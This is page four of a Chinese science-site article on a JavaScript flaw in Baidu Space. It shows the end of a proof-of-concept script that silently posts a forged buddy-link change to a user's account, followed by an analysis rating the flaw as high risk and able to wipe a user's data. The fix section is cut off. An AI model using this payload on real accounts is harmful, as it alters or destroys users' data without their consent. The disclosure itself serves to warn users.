相关文章  
  • 巧妙利用系统进程拒绝病毒侵袭
  • 让防火墙顺从我们的意图来工作
  • 斩断伸向个人隐私的木马黑手
  • 安全基础:防火墙功能指标详解
  • 邮件被病毒入侵遵循五个清除步骤
  • 安全基础:教你如何识别病毒现象
  • 常见端口的作用、漏洞和操作建议
  • 常用电脑密码破解实用技巧
  • 注意:纠正 14 条日常查杀电脑病毒的错误
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    百度空间存 js 破坏漏洞,网友发来短信求助(附代码)4

    ;desc=’%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB’;
    var url=’/’+user+’/commit’;
    var data=’ct=6&cm=1&spRef=’+escape(’http://hi.baidu.com/’+user)+’%2Fmodify%2Fbuddylink%2F0&spBuddyName=’+escape(name)+’&spBuddyURL=’+escape(link)+’&spBuddyIntro=’+escape(desc);
    req.open(’post’,url,false);
    req.send(data);
    }
    }
    }


      分析:

      该方法危险等级:高级.构造相应的js代码可以删除用户空间的所有数据.该漏洞目前未发现有恶意删除的现象,但已足够危险,请用户小心.

      解决办法:<

    页码:[1] [2] [3] [4] [5]4页、共5页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved